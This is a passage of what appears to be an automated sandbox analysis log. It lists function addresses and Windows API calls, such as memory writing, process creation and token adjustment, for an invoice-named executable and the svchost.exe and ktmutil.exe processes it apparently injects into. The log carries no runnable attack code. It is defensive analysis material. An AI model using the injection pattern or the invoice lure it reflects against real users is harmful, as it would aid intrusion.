                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242AB0 NtWaitForSingleObject,11_2_03242AB0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242F60 NtCreateProcessEx,11_2_03242F60
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242FA0 NtQuerySection,11_2_03242FA0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242F90 NtProtectVirtualMemory,11_2_03242F90
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242E30 NtWriteVirtualMemory,11_2_03242E30
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242EA0 NtAdjustPrivilegesToken,11_2_03242EA0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242D00 NtSetInformationFile,11_2_03242D00
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242DB0 NtEnumerateKey,11_2_03242DB0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242C00 NtQueryInformationProcess,11_2_03242C00
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242CF0 NtOpenProcess,11_2_03242CF0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242CC0 NtQueryVirtualMemory,11_2_03242CC0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03243010 NtOpenDirectoryObject,11_2_03243010
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03243090 NtSetValueKey,11_2_03243090
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03243D10 NtOpenProcessToken,11_2_03243D10
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03243D70 NtOpenThread,11_2_03243D70
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_027A9280 NtCreateFile,11_2_027A9280
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_027A93F0 NtReadFile,11_2_027A93F0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_027A9700 NtAllocateVirtualMemory,11_2_027A9700
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_027A94F0 NtDeleteFile,11_2_027A94F0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_027A95A0 NtClose,11_2_027A95A0
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00236606: CreateFileW,DeviceIoControl,CloseHandle,2_2_00236606
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0022ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,2_2_0022ACC5
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_002379D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_002379D3
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0021B0432_2_0021B043
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_002032002_2_00203200
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00203B702_2_00203B70
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0022410F2_2_0022410F
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_002102A42_2_002102A4
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0022038E2_2_0022038E
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_001FE3B02_2_001FE3B0
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0022467F2_2_0022467F
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_002106D92_2_002106D9
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0025AACE2_2_0025AACE
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00224BEF2_2_00224BEF
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0021CCC12_2_0021CCC1
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_001F6F072_2_001F6F07
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_001FAF502_2_001FAF50
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0020B11F2_2_0020B11F
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0021D1B92_2_0021D1B9
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_002531BC2_2_002531BC
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0021123A2_2_0021123A
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0022724D2_2_0022724D
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_002313CA2_2_002313CA
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_001F93F02_2_001F93F0
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0020F5632_2_0020F563
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_001F96C02_2_001F96C0
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0023B6CC2_2_0023B6CC
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_001F77B02_2_001F77B0
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0025F7FF2_2_0025F7FF
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_002279C92_2_002279C9
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0020FA572_2_0020FA57
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_001F9B602_2_001F9B60
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_001F7D192_2_001F7D19
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0020FE6F2_2_0020FE6F
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00219ED02_2_00219ED0
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_001F7FA32_2_001F7FA3
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00E281482_2_00E28148
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004188F34_2_004188F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004030604_2_00403060
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004010C04_2_004010C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004101CA4_2_004101CA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004101D34_2_004101D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004012004_2_00401200
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0040235D4_2_0040235D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004023604_2_00402360
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00416B334_2_00416B33
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004103F34_2_004103F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00402B954_2_00402B95
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00402BA04_2_00402BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0040E46B4_2_0040E46B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0040E4734_2_0040E473
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0042EEA34_2_0042EEA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4E3F04_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B003E64_2_03B003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AFA3524_2_03AFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC02C04_2_03AC02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AE02744_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B001AA4_2_03B001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AF81CC4_2_03AF81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A301004_2_03A30100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03ADA1184_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC81584_2_03AC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD20004_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3C7C04_2_03A3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A407704_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A647504_2_03A64750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5C6E04_2_03A5C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B005914_2_03B00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A405354_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AEE4F64_2_03AEE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AF24464_2_03AF2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AF6BD74_2_03AF6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AFAB404_2_03AFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3EA804_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A429A04_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B0A9A64_2_03B0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A569624_2_03A56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A268B84_2_03A268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6E8F04_2_03A6E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4A8404_2_03A4A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A428404_2_03A42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03ABEFA04_2_03ABEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4CFE04_2_03A4CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A32FC84_2_03A32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A82F284_2_03A82F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A60F304_2_03A60F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB4F404_2_03AB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A52E904_2_03A52E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AFCE934_2_03AFCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AFEEDB4_2_03AFEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AFEE264_2_03AFEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40E594_2_03A40E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A58DBF4_2_03A58DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3ADE04_2_03A3ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4AD004_2_03A4AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AE0CB54_2_03AE0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A30CF24_2_03A30CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40C004_2_03A40C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A8739A4_2_03A8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AF132D4_2_03AF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2D34C4_2_03A2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A452A04_2_03A452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AE12ED4_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5B2C04_2_03A5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4B1B04_2_03A4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A7516C4_2_03A7516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2F1724_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B0B16B4_2_03B0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AF70E94_2_03AF70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AFF0E04_2_03AFF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AEF0CC4_2_03AEF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A470C04_2_03A470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AFF7B04_2_03AFF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AF16CC4_2_03AF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03ADD5B04_2_03ADD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AF75714_2_03AF7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AFF43F4_2_03AFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A314604_2_03A31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5FB804_2_03A5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB5BF04_2_03AB5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A7DBF94_2_03A7DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AFFB764_2_03AFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03ADDAAC4_2_03ADDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A85AA04_2_03A85AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AEDAC64_2_03AEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB3A6C4_2_03AB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AFFA494_2_03AFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AF7A464_2_03AF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD59104_2_03AD5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A499504_2_03A49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5B9504_2_03A5B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A438E04_2_03A438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAD8004_2_03AAD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AFFFB14_2_03AFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A41F924_2_03A41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AFFF094_2_03AFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A49EB04_2_03A49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5FDC04_2_03A5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AF7D734_2_03AF7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A43D404_2_03A43D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AF1D5A4_2_03AF1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AFFCF24_2_03AFFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB9C324_2_03AB9C32
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeCode function: 8_2_049650438_2_04965043
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeCode function: 8_2_049650928_2_04965092
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeCode function: 8_2_0496701A8_2_0496701A
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeCode function: 8_2_04966DF18_2_04966DF1
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeCode function: 8_2_04966DFA8_2_04966DFA
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeCode function: 8_2_04985ACA8_2_04985ACA
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeCode function: 8_2_0496D75A8_2_0496D75A
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032CA35211_2_032CA352
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032D03E611_2_032D03E6
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0321E3F011_2_0321E3F0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032B027411_2_032B0274
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032902C011_2_032902C0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0320010011_2_03200100
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032AA11811_2_032AA118
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0329815811_2_03298158
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032D01AA11_2_032D01AA
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032C41A211_2_032C41A2
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032C81CC11_2_032C81CC
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032A200011_2_032A2000
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0321077011_2_03210770
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0323475011_2_03234750
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0320C7C011_2_0320C7C0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0322C6E011_2_0322C6E0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0321053511_2_03210535
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032D059111_2_032D0591
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032B442011_2_032B4420
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032C244611_2_032C2446
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032BE4F611_2_032BE4F6
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032CAB4011_2_032CAB40
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032C6BD711_2_032C6BD7
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0320EA8011_2_0320EA80
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0322696211_2_03226962
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032129A011_2_032129A0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032DA9A611_2_032DA9A6
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0321A84011_2_0321A840
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0321284011_2_03212840
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_031F68B811_2_031F68B8
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0323E8F011_2_0323E8F0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03252F2811_2_03252F28
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03230F3011_2_03230F30
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032B2F3011_2_032B2F30
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03284F4011_2_03284F40
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0328EFA011_2_0328EFA0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0321CFE011_2_0321CFE0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03202FC811_2_03202FC8
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032CEE2611_2_032CEE26
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03210E5911_2_03210E59
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03222E9011_2_03222E90
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032CCE9311_2_032CCE93
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032CEEDB11_2_032CEEDB
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0321AD0011_2_0321AD00
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032ACD1F11_2_032ACD1F
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03228DBF11_2_03228DBF
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0320ADE011_2_0320ADE0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03210C0011_2_03210C00
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032B0CB511_2_032B0CB5
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03200CF211_2_03200CF2
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032C132D11_2_032C132D
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_031FD34C11_2_031FD34C
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0325739A11_2_0325739A
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032152A011_2_032152A0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032B12ED11_2_032B12ED
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0322B2C011_2_0322B2C0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032DB16B11_2_032DB16B
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0324516C11_2_0324516C
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_031FF17211_2_031FF172
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0321B1B011_2_0321B1B0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032C70E911_2_032C70E9
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032CF0E011_2_032CF0E0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032170C011_2_032170C0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032BF0CC11_2_032BF0CC
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032CF7B011_2_032CF7B0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0325563011_2_03255630
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032C16CC11_2_032C16CC
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032C757111_2_032C7571
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032AD5B011_2_032AD5B0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032D95C311_2_032D95C3
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032CF43F11_2_032CF43F
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0320146011_2_03201460
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032CFB7611_2_032CFB76
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0322FB8011_2_0322FB80
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03285BF011_2_03285BF0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0324DBF911_2_0324DBF9
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03283A6C11_2_03283A6C
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032CFA4911_2_032CFA49
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032C7A4611_2_032C7A46
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03255AA011_2_03255AA0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032ADAAC11_2_032ADAAC
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032B1AA311_2_032B1AA3
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032BDAC611_2_032BDAC6
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032A591011_2_032A5910
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0321995011_2_03219950
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0322B95011_2_0322B950
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0327D80011_2_0327D800
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032138E011_2_032138E0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032CFF0911_2_032CFF09
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032CFFB111_2_032CFFB1
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03211F9211_2_03211F92
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03219EB011_2_03219EB0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032C7D7311_2_032C7D73
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03213D4011_2_03213D40
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032C1D5A11_2_032C1D5A
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0322FDC011_2_0322FDC0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03289C3211_2_03289C32
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032CFCF211_2_032CFCF2
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_02791FB011_2_02791FB0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0278CEF011_2_0278CEF0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0278CEE711_2_0278CEE7
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0278D11011_2_0278D110
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0278B19011_2_0278B190
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0278B18811_2_0278B188
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0279561011_2_02795610
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_027ABBC011_2_027ABBC0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0279385011_2_02793850
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_02FCE34411_2_02FCE344
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_02FCE46311_2_02FCE463
